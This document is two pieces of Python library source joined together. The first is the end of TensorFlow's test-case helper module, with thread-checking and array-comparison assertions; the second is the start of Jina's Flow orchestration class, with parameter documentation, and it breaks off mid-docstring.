except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
a: The expected numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from jina.orchestrate.flow.builder import allowed_levels, _hanging_pods
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import FlowTopologyError, FlowMissingPodError, RuntimeFailToStart
from jina.helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from jina.parsers.flow import set_flow_parser
from jina.orchestrate.pods import Pod
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.serve.executors import BaseExecutor
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
results_as_docarray: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param results_as_docarray: If set, return results as DocArray instead of Request.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after_address: The address of the uses-before runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.parsers.flow import set_flow_parser
from jina.helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
self._pod_nodes[GATEWAY_NAME] = Pod(args, needs)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port_in}']
return graph_dict
def _get_k8s_pod_addresses(self, k8s_namespace: str) -> Dict[str, List[str]]:
graph_dict = {}
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
return graph_dict
def _get_docker_compose_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.pods.config.docker_compose import PORT_IN
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{PORT_IN}'
)
graph_dict[node] = [pod_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
